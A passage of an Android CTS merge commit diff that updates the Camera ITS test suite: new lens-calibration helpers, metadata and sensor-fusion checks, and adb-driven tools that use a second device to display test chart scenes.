Merge "Merge "Add automotive feature to exclude feature of test case "Car Dock Test"." into marshmallow-cts-dev am: 418bf4efb7" into nougat-cts-dev
am: dd88145533
Change-Id: I9a2196d07393845d8a0460d284e04c18358d4216
diff --git a/OldCtsTestCaseList.mk b/OldCtsTestCaseList.mk
index 685d9a0..c54d283 100644
--- a/OldCtsTestCaseList.mk
+++ b/OldCtsTestCaseList.mk
@@ -15,9 +15,11 @@
cts_security_apps_list := \
CtsAppAccessData \
CtsAppWithData \
+ CtsDeclareNonRuntimePermissions \
CtsDocumentProvider \
CtsDocumentClient \
CtsEncryptionApp \
+ CtsEscalateToRuntimePermissions \
CtsExternalStorageApp \
CtsInstrumentationAppDiffCert \
CtsNetSecPolicyUsesCleartextTrafficFalse \
diff --git a/apps/CameraITS/build/envsetup.sh b/apps/CameraITS/build/envsetup.sh
index bcf294a..de50ad8 100644
--- a/apps/CameraITS/build/envsetup.sh
+++ b/apps/CameraITS/build/envsetup.sh
@@ -17,7 +17,7 @@
# and that the unit tests for the modules passed (indicating that the setup
# is correct).
-CAMERA_ITS_TOP=$PWD
+export CAMERA_ITS_TOP=$PWD
[[ "${BASH_SOURCE[0]}" != "${0}" ]] || \
{ echo ">> Script must be sourced with 'source $0'" >&2; exit 1; }
diff --git a/apps/CameraITS/pymodules/its/caps.py b/apps/CameraITS/pymodules/its/caps.py
index a33757d..d9270f7 100644
--- a/apps/CameraITS/pymodules/its/caps.py
+++ b/apps/CameraITS/pymodules/its/caps.py
@@ -394,6 +394,59 @@
"android.edge.availableEdgeModes") and mode \
in props["android.edge.availableEdgeModes"];
+
+def lens_calibrated(props):
+ """Returns whether lens position is calibrated or not.
+
+ android.lens.info.focusDistanceCalibration has 3 modes.
+ 0: Uncalibrated
+ 1: Approximate
+ 2: Calibrated
+
+ Args:
+ props: Camera properties objects.
+
+ Returns:
+ Boolean.
+ """
+ return props.has_key("android.lens.info.focusDistanceCalibration") and \
+ props["android.lens.info.focusDistanceCalibration"] == 2
+
+
+def lens_approx_calibrated(props):
+ """Returns whether lens position is calibrated or not.
+
+ android.lens.info.focusDistanceCalibration has 3 modes.
+ 0: Uncalibrated
+ 1: Approximate
+ 2: Calibrated
+
+ Args:
+ props: Camera properties objects.
+
+ Returns:
+ Boolean.
+ """
+ return props.has_key("android.lens.info.focusDistanceCalibration") and \
+ (props["android.lens.info.focusDistanceCalibration"] == 1 or
+ props["android.lens.info.focusDistanceCalibration"] == 2)
+
+
+def fixed_focus(props):
+ """Returns whether a device is fixed focus.
+
+ props[android.lens.info.minimumFocusDistance] == 0 is fixed focus
+
+ Args:
+ props: Camera properties objects.
+
+ Returns:
+ Boolean.
+ """
+ return props.has_key("android.lens.info.minimumFocusDistance") and \
+ props["android.lens.info.minimumFocusDistance"] == 0
+
+
class __UnitTest(unittest.TestCase):
"""Run a suite of unit tests on this module.
"""
diff --git a/apps/CameraITS/pymodules/its/device.py b/apps/CameraITS/pymodules/its/device.py
index 692a62d..3b378cc 100644
--- a/apps/CameraITS/pymodules/its/device.py
+++ b/apps/CameraITS/pymodules/its/device.py
@@ -754,15 +754,24 @@
Return the device ID provided in the command line if it's connected. If no
device ID is provided in the command line and there is only one device
connected, return the device ID by parsing the result of "adb devices".
+ Also, if the environment variable ANDROID_SERIAL is set, use it as device
+ id. When both ANDROID_SERIAL and device argument present, device argument
+ takes priority.
Raise an exception if no device is connected; or the device ID provided in
the command line is not connected; or no device ID is provided in the
- command line and there are more than 1 device connected.
+ command line or environment variable and there are more than 1 device
+ connected.
Returns:
Device ID string.
"""
device_id = None
+
+ # Check if device id is set in env
+ if "ANDROID_SERIAL" in os.environ:
+ device_id = os.environ["ANDROID_SERIAL"]
+
for s in sys.argv[1:]:
if s[:7] == "device=" and len(s) > 7:
device_id = str(s[7:])
diff --git a/apps/CameraITS/pymodules/its/image.py b/apps/CameraITS/pymodules/its/image.py
index a5ac60b..f1539ba 100644
--- a/apps/CameraITS/pymodules/its/image.py
+++ b/apps/CameraITS/pymodules/its/image.py
@@ -18,7 +18,7 @@
import its.error
import pylab
import sys
-import Image
+from PIL import Image
import numpy
import math
import unittest
diff --git a/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py b/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
index 8f4682a..df904aa 100644
--- a/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
+++ b/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
@@ -21,7 +21,6 @@
import matplotlib
import matplotlib.pyplot as plt
import math
-import Image
import time
import numpy as np
import scipy.stats
@@ -157,7 +156,7 @@
np.var(tile(hp, tile_size), axis=(0, 1)).flatten()
for (mean, var) in zip(means_tiled, vars_tiled):
- # Don't include the tile if it has samples that might
+ # Don't include the tile if it has samples that might
# be clipped.
if mean + 2*math.sqrt(var) < max_signal_level:
samples_e.append([mean, var])
@@ -175,7 +174,7 @@
samples.extend([(round(s), mean, var) for (mean, var) in samples_s])
# Add the linear fit to the plot for this sensitivity.
- plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'r-',
+ plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'r-',
label="Linear fit")
xmax = max([x for (x, _) in samples_s])*1.25
plt_s.set_xlim(xmin=0, xmax=xmax)
@@ -219,7 +218,7 @@
[A, B, C, D], _, _, _ = np.linalg.lstsq(a, b)
- # Plot the noise model components with the values predicted by the
+ # Plot the noise model components with the values predicted by the
# noise model.
S_model = A*sens + B
O_model = \
@@ -228,14 +227,14 @@
(fig, (plt_S, plt_O)) = plt.subplots(2, 1)
plt_S.set_title("Noise model")
plt_S.set_ylabel("S")
- plt_S.loglog(sens, S_measured, 'r+', basex=10, basey=10,
+ plt_S.loglog(sens, S_measured, 'r+', basex=10, basey=10,
label="Measured")
plt_S.loglog(sens, S_model, 'bx', basex=10, basey=10, label="Model")
plt_S.legend(loc=2)
plt_O.set_xlabel("ISO")
plt_O.set_ylabel("O")
- plt_O.loglog(sens, O_measured, 'r+', basex=10, basey=10,
+ plt_O.loglog(sens, O_measured, 'r+', basex=10, basey=10,
label="Measured")
plt_O.loglog(sens, O_model, 'bx', basex=10, basey=10, label="Model")
fig.savefig("%s.png" % (NAME))
@@ -246,7 +245,7 @@
dg = max(s/sens_max_analog, 1)
S = A*s + B
O = C*s*s + D*dg*dg
- plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'b-',
+ plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'b-',
label="Model")
plt_s.legend(loc=2)
diff --git a/apps/CameraITS/tests/scene0/test_metadata.py b/apps/CameraITS/tests/scene0/test_metadata.py
index 2914493..e5fbba5 100644
--- a/apps/CameraITS/tests/scene0/test_metadata.py
+++ b/apps/CameraITS/tests/scene0/test_metadata.py
@@ -12,11 +12,13 @@
# See the License for the specific language governing permissions and
# limitations under the License.
-import its.image
+import math
+
+import its.caps
import its.device
import its.objects
import its.target
-import its.caps
+
def main():
"""Test the validity of some metadata entries.
@@ -75,6 +77,34 @@
assert(not failed)
+ if not its.caps.legacy(props):
+ # Test: pixel_pitch, FOV, and hyperfocal distance are reasonable
+ fmts = props["android.scaler.streamConfigurationMap"]["availableStreamConfigurations"]
+ fmts = sorted(fmts, key=lambda k: k["width"]*k["height"], reverse=True)
+ sensor_size = props["android.sensor.info.physicalSize"]
+ pixel_pitch_h = (sensor_size["height"] / fmts[0]["height"] * 1E3)
+ pixel_pitch_w = (sensor_size["width"] / fmts[0]["width"] * 1E3)
+ print "Assert pixel_pitch WxH: %.2f um, %.2f um" % (pixel_pitch_w,
+ pixel_pitch_h)
+ assert 1.0 <= pixel_pitch_w <= 10
+ assert 1.0 <= pixel_pitch_h <= 10
+ assert 0.333 <= pixel_pitch_w/pixel_pitch_h <= 3.0
+
+ diag = math.sqrt(sensor_size["height"] ** 2 +
+ sensor_size["width"] ** 2)
+ fl = md["android.lens.focalLength"]
+ fov = 2 * math.degrees(math.atan(diag / (2 * fl)))
+ print "Assert field of view: %.1f degrees" % fov
+ assert 30 <= fov <= 130
+
+ if its.caps.lens_approx_calibrated(props):
+ diopter_hyperfocal = props["android.lens.info.hyperfocalDistance"]
+ if diopter_hyperfocal != 0.0:
+ hyperfocal = 1.0 / diopter_hyperfocal
+ print "Assert hyperfocal distance: %.2f m" % hyperfocal
+ assert 0.02 <= hyperfocal
+
+
def getval(expr, default=None):
try:
return eval(expr)
@@ -82,6 +112,8 @@
return default
failed = False
+
+
def check(expr):
global md, props, failed
try:
diff --git a/apps/CameraITS/tests/scene1/scene1.pdf b/apps/CameraITS/tests/scene1/scene1.pdf
new file mode 100644
index 0000000..7e47bcf
--- /dev/null
+++ b/apps/CameraITS/tests/scene1/scene1.pdf
Binary files differ
diff --git a/apps/CameraITS/tests/scene1/test_capture_result.py b/apps/CameraITS/tests/scene1/test_capture_result.py
index ec919f8..cde37c2 100644
--- a/apps/CameraITS/tests/scene1/test_capture_result.py
+++ b/apps/CameraITS/tests/scene1/test_capture_result.py
@@ -77,11 +77,11 @@
h_map = props["android.lens.info.shadingMapSize"]["height"]
print "Testing auto capture results"
- lsc_map_auto = test_auto(cam, w_map, h_map)
+ lsc_map_auto = test_auto(cam, w_map, h_map, props)
print "Testing manual capture results"
- test_manual(cam, w_map, h_map, lsc_map_auto)
+ test_manual(cam, w_map, h_map, lsc_map_auto, props)
print "Testing auto capture results again"
- test_auto(cam, w_map, h_map)
+ test_auto(cam, w_map, h_map, props)
# A very loose definition for two floats being close to each other;
# there may be different interpolation and rounding used to get the
@@ -105,7 +105,7 @@
ax.plot_wireframe(xs, ys, zs)
matplotlib.pyplot.savefig("%s_plot_lsc_%s_ch%d.png"%(NAME,name,ch))
-def test_auto(cam, w_map, h_map):
+def test_auto(cam, w_map, h_map, props):
# Get 3A lock first, so the auto values in the capture result are
# populated properly.
rect = [[0,0,1,1,1]]
@@ -124,9 +124,12 @@
print "Gains:", gains
print "Transform:", [its.objects.rational_to_float(t)
for t in transform]
- print "AE region:", cap_res['android.control.aeRegions']
- print "AF region:", cap_res['android.control.afRegions']
- print "AWB region:", cap_res['android.control.awbRegions']
+ if props["android.control.maxRegionsAe"] > 0:
+ print "AE region:", cap_res['android.control.aeRegions']
+ if props["android.control.maxRegionsAf"] > 0:
+ print "AF region:", cap_res['android.control.afRegions']
+ if props["android.control.maxRegionsAwb"] > 0:
+ print "AWB region:", cap_res['android.control.awbRegions']
print "LSC map:", w_map, h_map, lsc_map[:8]
assert(ctrl_mode == 1)
@@ -154,7 +157,7 @@
return lsc_map
-def test_manual(cam, w_map, h_map, lsc_map_auto):
+def test_manual(cam, w_map, h_map, lsc_map_auto, props):
cap = cam.do_capture(manual_req)
cap_res = cap["metadata"]
@@ -172,9 +175,12 @@
print "Transform:", [its.objects.rational_to_float(t)
for t in transform]
print "Tonemap:", curves[0][1::16]
- print "AE region:", cap_res['android.control.aeRegions']
- print "AF region:", cap_res['android.control.afRegions']
- print "AWB region:", cap_res['android.control.awbRegions']
+ if props["android.control.maxRegionsAe"] > 0:
+ print "AE region:", cap_res['android.control.aeRegions']
+ if props["android.control.maxRegionsAf"] > 0:
+ print "AF region:", cap_res['android.control.afRegions']
+ if props["android.control.maxRegionsAwb"] > 0:
+ print "AWB region:", cap_res['android.control.awbRegions']
print "LSC map:", w_map, h_map, lsc_map[:8]
assert(ctrl_mode == 0)
diff --git a/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py b/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
index 49ccbcf..a05a254 100644
--- a/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
+++ b/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
@@ -23,7 +23,11 @@
import numpy
#AE must converge within this number of auto requests for EV
-THREASH_CONVERGE_FOR_EV = 8
+THRESH_CONVERGE_FOR_EV = 8
+YUV_FULL_SCALE = 255.0
+YUV_SATURATION_MIN = 253.0
+YUV_SATURATION_TOL = 1.0
+
def main():
"""Tests that EV compensation is applied.
@@ -66,9 +70,19 @@
pylab.plot(evs, lumas, 'r')
matplotlib.pyplot.savefig("%s_plot_means.png" % (NAME))
- # trim trailing 1.0s (for saturated image)
- while lumas and lumas[-1] == 1.0:
- lumas.pop(-1)
+ # Trim extra saturated images
+ while lumas and lumas[-1] >= YUV_SATURATION_MIN/YUV_FULL_SCALE:
+ if (np.isclose(reds[-1], greens[-1],
+ YUV_SATURATION_TOL/YUV_FULL_SCALE) and
+ np.isclose(blues[-1], greens[-1],
+ YUV_SATURATION_TOL/YUV_FULL_SCALE)):
+ lumas.pop(-1)
+ reds.pop(-1)
+ greens.pop(-1)
+ blues.pop(-1)
+ print 'Removed saturated image.'
+ else:
+ break
# Only allow positive EVs to give saturated image
assert(len(lumas) > 2)
luma_diffs = numpy.diff(lumas)
diff --git a/apps/CameraITS/tests/scene2/scene2.pdf b/apps/CameraITS/tests/scene2/scene2.pdf
new file mode 100644
index 0000000..ccde9d98
--- /dev/null
+++ b/apps/CameraITS/tests/scene2/scene2.pdf
Binary files differ
diff --git a/apps/CameraITS/tests/scene2/test_faces.py b/apps/CameraITS/tests/scene2/test_faces.py
index cce74e7..388a7e0 100644
--- a/apps/CameraITS/tests/scene2/test_faces.py
+++ b/apps/CameraITS/tests/scene2/test_faces.py
@@ -13,6 +13,7 @@
# limitations under the License.
import its.image
+import its.caps
import its.device
import its.objects
import os.path
@@ -31,16 +32,38 @@
fd_modes = props['android.statistics.info.availableFaceDetectModes']
a = props['android.sensor.info.activeArraySize']
aw, ah = a['right'] - a['left'], a['bottom'] - a['top']
- cam.do_3a()
+ if its.caps.read_3a(props):
+ gain, exp, _, _, focus = cam.do_3a(get_results=True)
+ print 'iso = %d' % gain
+ print 'exp = %.2fms' % (exp*1.0E-6)
+ if focus == 0.0:
+ print 'fd = infinity'
+ else:
+ print 'fd = %.2fcm' % (1.0E2/focus)
for fd_mode in fd_modes:
assert(FD_MODE_OFF <= fd_mode <= FD_MODE_FULL)
req = its.objects.auto_capture_request()
req['android.statistics.faceDetectMode'] = fd_mode
- caps = cam.do_capture([req]*NUM_TEST_FRAMES)
+ max_img_size = its.objects.get_available_output_sizes("yuv", props)[0]
+ w = max_img_size[0]
+ h = max_img_size[1]
+ out_surf=None
+ if w * h > 12 * 1024 * 1024:
+ size_to_use = its.objects.get_available_output_sizes("yuv",
+ props, max_size=(4000, 3000), match_ar_size=(w, h))[0]
+ out_surf = {
+ "width": size_to_use[0],
+ "height": size_to_use[1],
+ "format": "yuv",
+ }
+ caps = cam.do_capture([req]*NUM_TEST_FRAMES, out_surfaces=out_surf)
for i,cap in enumerate(caps):
md = cap['metadata']
assert(md['android.statistics.faceDetectMode'] == fd_mode)
faces = md['android.statistics.faces']
+ img = its.image.convert_capture_to_rgb_image(cap, props=props)
+ img_name = "%s_fd_mode_%s.jpg" % (NAME, fd_mode)
+ its.image.write_image(img, img_name)
# 0 faces should be returned for OFF mode
if fd_mode == FD_MODE_OFF:
diff --git a/apps/CameraITS/tests/scene3/scene3.pdf b/apps/CameraITS/tests/scene3/scene3.pdf
new file mode 100644
index 0000000..4c787b1
--- /dev/null
+++ b/apps/CameraITS/tests/scene3/scene3.pdf
Binary files differ
diff --git a/apps/CameraITS/tests/scene4/scene4.pdf b/apps/CameraITS/tests/scene4/scene4.pdf
new file mode 100644
index 0000000..7dcc4b9
--- /dev/null
+++ b/apps/CameraITS/tests/scene4/scene4.pdf
Binary files differ
diff --git a/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py b/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
index a26889b..065f854 100644
--- a/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
+++ b/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
@@ -52,16 +52,16 @@
with its.device.ItsSession() as cam:
props = cam.get_camera_properties()
- its.caps.skip_unless(its.caps.read_3a(props))
- # Converge 3A and get the estimates.
- sens, exp, gains, xform, focus = cam.do_3a(get_results=True,
- do_af=False,
- lock_ae=True,
- lock_awb=True)
- print "AE sensitivity %d, exposure %dms" % (sens, exp / 1000000.0)
- print "AWB gains", gains
- print "AWB transform", xform
- print "AF distance", focus
+ if its.caps.read_3a(props):
+ # Converge 3A and get the estimates.
+ sens, exp, gains, xform, focus = cam.do_3a(get_results=True,
+ do_af=False,
+ lock_ae=True,
+ lock_awb=True)
+ print "AE sensitivity %d, exposure %dms" % (sens, exp / 1000000.0)
+ print "AWB gains", gains
+ print "AWB transform", xform
+ print "AF distance", focus
req = its.objects.auto_capture_request()
img_size = its.objects.get_available_output_sizes("yuv", props)
w = img_size[0][0]
diff --git a/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py b/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
index c4f9b84..bbd1417 100644
--- a/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
+++ b/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
@@ -23,7 +23,7 @@
import matplotlib
import matplotlib.pyplot
import json
-import Image
+from PIL import Image
import numpy
import cv2
import bisect
@@ -35,8 +35,20 @@
# Capture 210 VGA frames (which is 7s at 30fps)
N = 210
W,H = 640,480
+FEATURE_MARGIN = H * 0.20 / 2 # Only take feature points from the center 20%
+ # so that the rotation measured have much less
+ # of rolling shutter effect
-FEATURE_PARAMS = dict( maxCorners = 80,
+MIN_FEATURE_PTS = 30 # Minimum number of feature points required to
+ # perform rotation analysis
+
+MAX_CAM_FRM_RANGE_SEC = 9.0 # Maximum allowed camera frame range. When this
+ # number is significantly larger than 7 seconds,
+ # usually system is in some busy/bad states.
+
+MIN_GYRO_SMP_RATE = 100.0 # Minimum gyro sample rate
+
+FEATURE_PARAMS = dict( maxCorners = 240,
qualityLevel = 0.3,
minDistance = 7,
blockSize = 7 )
@@ -102,6 +114,14 @@
min_cam_time, max_cam_time, min_gyro_time, max_gyro_time)
assert(0)
+ cam_frame_range = max_cam_time - min_cam_time
+ gyro_time_range = max_gyro_time - min_gyro_time
+ gyro_smp_per_sec = len(gyro_times) / gyro_time_range
+ print "Camera frame range", max_cam_time - min_cam_time
+ print "Gyro samples per second", gyro_smp_per_sec
+ assert(cam_frame_range < MAX_CAM_FRM_RANGE_SEC)
+ assert(gyro_smp_per_sec > MIN_GYRO_SMP_RATE)
+
# Compute the camera rotation displacements (rad) between each pair of
# adjacent frames.
cam_rots = get_cam_rotations(frames, events["facing"])
@@ -140,9 +160,9 @@
Returns:
Offset (seconds) of the best alignment.
"""
- # Measure the corr. dist. over a shift of up to +/- 100ms (1ms step size).
+ # Measure the corr. dist. over a shift of up to +/- 50ms (0.5ms step size).
# Get the shift corresponding to the best (lowest) score.
- candidates = range(-100,101)
+ candidates = numpy.arange(-50,50.5,0.5).tolist()
dists = []
for shift in candidates:
times = cam_times + shift*MSEC_TO_NSEC
@@ -151,22 +171,26 @@
best_corr_dist = min(dists)
best_shift = candidates[dists.index(best_corr_dist)]
+ print "Best shift without fitting is ", best_shift, "ms"
+
# Fit a curve to the corr. dist. data to measure the minima more
# accurately, by looking at the correlation distances within a range of
- # +/- 20ms from the measured best score; note that this will use fewer
- # than the full +/- 20 range for the curve fit if the measured score
- # (which is used as the center of the fit) is within 20ms of the edge of
- # the +/- 100ms candidate range.
- i = len(dists)/2 + best_shift
+ # +/- 10ms from the measured best score; note that this will use fewer
+ # than the full +/- 10 range for the curve fit if the measured score
+ # (which is used as the center of the fit) is within 10ms of the edge of
+ # the +/- 50ms candidate range.
+ i = dists.index(best_corr_dist)
candidates = candidates[i-20:i+21]
dists = dists[i-20:i+21]
a,b,c = numpy.polyfit(candidates, dists, 2)
exact_best_shift = -b/(2*a)
if abs(best_shift - exact_best_shift) > 2.0 or a <= 0 or c <= 0:
print "Test failed; bad fit to time-shift curve"
+ print "best_shift %f, exact_best_shift %f, a %f, c %f" % (best_shift,
+ exact_best_shift, a, c)
assert(0)
- xfit = [x/10.0 for x in xrange(candidates[0]*10,candidates[-1]*10)]
+ xfit = numpy.arange(candidates[0], candidates[-1], 0.05).tolist()
yfit = [a*x*x+b*x+c for x in xfit]
fig = matplotlib.pyplot.figure()
pylab.plot(candidates, dists, 'r', label="data")
@@ -263,13 +287,23 @@
frame = (frame * 255.0).astype(numpy.uint8)
gframes.append(cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY))
rots = []
+ ymin = H/2 - FEATURE_MARGIN
+ ymax = H/2 + FEATURE_MARGIN
for i in range(1,len(gframes)):
gframe0 = gframes[i-1]
gframe1 = gframes[i]
p0 = cv2.goodFeaturesToTrack(gframe0, mask=None, **FEATURE_PARAMS)
- p1,st,_ = cv2.calcOpticalFlowPyrLK(gframe0, gframe1, p0, None,
+ # p0's shape is N * 1 * 2
+ mask = (p0[:,0,1] >= ymin) & (p0[:,0,1] <= ymax)
+ p0_filtered = p0[mask]
+ if len(p0_filtered) < MIN_FEATURE_PTS:
+ print "Not enough feature points in frame", i
+ print "Need at least %d features, got %d" % (
+ MIN_FEATURE_PTS, len(p0_filtered))
+ assert(0)
+ p1,st,_ = cv2.calcOpticalFlowPyrLK(gframe0, gframe1, p0_filtered, None,
**LK_PARAMS)
- tform = procrustes_rotation(p0[st==1], p1[st==1])
+ tform = procrustes_rotation(p0_filtered[st==1], p1[st==1])
if facing == FACING_BACK:
rot = -math.atan2(tform[0, 1], tform[0, 0])
elif facing == FACING_FRONT:
@@ -282,7 +316,7 @@
# Save a debug visualization of the features that are being
# tracked in the first frame.
frame = frames[i]
- for x,y in p0[st==1]:
+ for x,y in p0_filtered[st==1]:
cv2.circle(frame, (x,y), 3, (100,100,255), -1)
its.image.write_image(frame, "%s_features.png"%(NAME))
return numpy.array(rots)
@@ -342,8 +376,8 @@
print "Starting sensor event collection"
cam.start_sensor_events()
- # Sleep a few seconds for gyro events to stabilize.
- time.sleep(2)
+ # Sleep a while for gyro events to stabilize.
+ time.sleep(0.5)
# TODO: Ensure that OIS is disabled; set to DISABLE and wait some time.
@@ -354,7 +388,7 @@
assert(0)
fmt = {"format":"yuv", "width":W, "height":H}
- s,e,_,_,_ = cam.do_3a(get_results=True)
+ s,e,_,_,_ = cam.do_3a(get_results=True, do_af=False)
req = its.objects.manual_capture_request(s, e)
print "Capturing %dx%d with sens. %d, exp. time %.1fms" % (
W, H, s, e*NSEC_TO_MSEC)
@@ -363,6 +397,7 @@
# Get the gyro events.
print "Reading out sensor events"
gyro = cam.get_sensor_events()["gyro"]
+ print "Number of gyro samples", len(gyro)
# Combine the events into a single structure.
print "Dumping event data"
diff --git a/apps/CameraITS/tools/load_scene.py b/apps/CameraITS/tools/load_scene.py
new file mode 100644
index 0000000..4e245f4
--- /dev/null
+++ b/apps/CameraITS/tools/load_scene.py
@@ -0,0 +1,61 @@
+# Copyright 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import os
+import re
+import subprocess
+import sys
+import time
+
+
+def main():
+ """Load charts on device and display."""
+ camera_id = -1
+ scene = None
+ for s in sys.argv[1:]:
+ if s[:6] == 'scene=' and len(s) > 6:
+ scene = s[6:]
+ elif s[:7] == 'screen=' and len(s) > 7:
+ screen_id = s[7:]
+
+ cmd = ('adb -s %s shell am force-stop com.google.android.apps.docs' %
+ screen_id)
+ subprocess.Popen(cmd.split())
+
+ if not scene:
+ print 'Error: need to specify which scene to load'
+ assert False
+
+ if not screen_id:
+ print 'Error: need to specify screen serial'
+ assert False
+
+ remote_scene_file = '/sdcard/Download/%s.pdf' % scene
+ local_scene_file = os.path.join(os.environ['CAMERA_ITS_TOP'], 'tests',
+ scene, scene+'.pdf')
+ print 'Loading %s on %s' % (remote_scene_file, screen_id)
+ cmd = 'adb -s %s push %s /mnt%s' % (screen_id, local_scene_file,
+ remote_scene_file)
+ subprocess.Popen(cmd.split())
+ time.sleep(1) # wait-for-device doesn't always seem to work...
+ # The intent require PDF viewing app be installed on device.
+ # Also the first time such app is opened it might request some permission,
+ # so it's better to grant those permissions before using this script
+ cmd = ("adb -s %s wait-for-device shell am start -d 'file://%s'"
+ " -a android.intent.action.VIEW" % (screen_id,
+ remote_scene_file))
+ subprocess.Popen(cmd.split())
+
+if __name__ == '__main__':
+ main()
diff --git a/apps/CameraITS/tools/run_all_tests.py b/apps/CameraITS/tools/run_all_tests.py
index 678c35c..c6ff548 100644
--- a/apps/CameraITS/tools/run_all_tests.py
+++ b/apps/CameraITS/tools/run_all_tests.py
@@ -34,6 +34,11 @@
scenes: the test scene(s) to be executed. Use comma to separate multiple
scenes. Ex: "scenes=scene0,scene1" or "scenes=0,1,sensor_fusion"
(sceneX can be abbreviated by X where X is a integer)
+ chart: [Experimental] another android device served as test chart
+ display. When this argument presents, change of test scene will
+ be handled automatically. Note that this argument requires
+ special physical/hardware setup to work and may not work on
+ all android devices.
"""
SKIP_RET_CODE = 101
@@ -59,6 +64,8 @@
all_scenes = ["scene0", "scene1", "scene2", "scene3", "scene4", "scene5"]
+ auto_scenes = ["scene0", "scene1", "scene2", "scene3", "scene4"]
+
scene_req = {
"scene0" : None,
"scene1" : "A grey card covering at least the middle 30% of the scene",
@@ -83,28 +90,34 @@
camera_ids = []
scenes = []
+ chart_host_id = None
for s in sys.argv[1:]:
if s[:7] == "camera=" and len(s) > 7:
camera_ids = s[7:].split(',')
elif s[:7] == "scenes=" and len(s) > 7:
scenes = s[7:].split(',')
+ elif s[:6] == 'chart=' and len(s) > 6:
+ chart_host_id = s[6:]
+
+ auto_scene_switch = chart_host_id is not None
# Run through all scenes if user does not supply one
+ possible_scenes = auto_scenes if auto_scene_switch else all_scenes
if not scenes:
- scenes = all_scenes
+ scenes = possible_scenes
else:
# Validate user input scene names
valid_scenes = True
temp_scenes = []
for s in scenes:
- if s in all_scenes:
+ if s in possible_scenes:
temp_scenes.append(s)
else:
try:
# Try replace "X" to "sceneX"
scene_num = int(s)
scene_str = "scene" + s
- if scene_str not in all_scenes:
+ if scene_str not in possible_scenes:
valid_scenes = False
break
temp_scenes.append(scene_str)
@@ -146,6 +159,14 @@
print "Running ITS on camera: %s, scene %s" % (camera_ids, scenes)
+ if auto_scene_switch:
+ print 'Waking up chart screen: ', chart_host_id
+ screen_id_arg = ('screen=%s' % chart_host_id)
+ cmd = ['python', os.path.join(os.environ['CAMERA_ITS_TOP'], 'tools',
+ 'wake_up_screen.py'), screen_id_arg]
+ retcode = subprocess.call(cmd)
+ assert retcode == 0
+
for camera_id in camera_ids:
# Loop capturing images until user confirm test scene is correct
camera_id_arg = "camera=" + camera_id
@@ -169,18 +190,34 @@
if scene_req[scene] != None:
out_path = os.path.join(topdir, camera_id, scene+".jpg")
out_arg = "out=" + out_path
- scene_arg = "scene=" + scene_req[scene]
- extra_args = scene_extra_args.get(scene, [])
- cmd = ['python',
- os.path.join(os.getcwd(),"tools/validate_scene.py"),
- camera_id_arg, out_arg, scene_arg, device_id_arg] + \
- extra_args
+ if auto_scene_switch:
+ scene_arg = "scene=" + scene
+ cmd = ['python',
+ os.path.join(os.getcwd(), 'tools/load_scene.py'),
+ scene_arg, screen_id_arg]
+ else:
+ scene_arg = "scene=" + scene_req[scene]
+ extra_args = scene_extra_args.get(scene, [])
+ cmd = ['python',
+ os.path.join(os.getcwd(),"tools/validate_scene.py"),
+ camera_id_arg, out_arg,
+ scene_arg, device_id_arg] + extra_args
retcode = subprocess.call(cmd,cwd=topdir)
assert(retcode == 0)
print "Start running ITS on camera %s, %s" % (camera_id, scene)
# Run each test, capturing stdout and stderr.
for (testname,testpath) in tests:
+ if auto_scene_switch:
+ # Send an input event to keep the screen not dimmed.
+ # Since we are not using camera of chart screen, FOCUS event
+ # should does nothing but keep the screen from dimming.
+ # The "sleep after x minutes of inactivity" display setting
+ # determines how long this command can keep screen bright.
+ # Setting it to something like 30 minutes should be enough.
+ cmd = ('adb -s %s shell input keyevent FOCUS'
+ % chart_host_id)
+ subprocess.call(cmd.split())
cmd = ['python', os.path.join(os.getcwd(),testpath)] + \
sys.argv[1:] + [camera_id_arg]
outdir = os.path.join(topdir,camera_id,scene)
@@ -243,6 +280,14 @@
print "Reporting ITS result to CtsVerifier"
its.device.report_result(device_id, camera_id, results)
+ if auto_scene_switch:
+ print 'Shutting down chart screen: ', chart_host_id
+ screen_id_arg = ('screen=%s' % chart_host_id)
+ cmd = ['python', os.path.join(os.environ['CAMERA_ITS_TOP'], 'tools',
+ 'turn_off_screen.py'), screen_id_arg]
+ retcode = subprocess.call(cmd)
+ assert retcode == 0
+
print "ITS tests finished. Please go back to CtsVerifier and proceed"
if __name__ == '__main__':
diff --git a/apps/CameraITS/tools/turn_off_screen.py b/apps/CameraITS/tools/turn_off_screen.py
new file mode 100644
index 0000000..4163ab4
--- /dev/null
+++ b/apps/CameraITS/tools/turn_off_screen.py
@@ -0,0 +1,42 @@
+# Copyright 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import re
+import subprocess
+import sys
+
+
+def main():
+ """Put screen to sleep."""
+ screen_id = ''
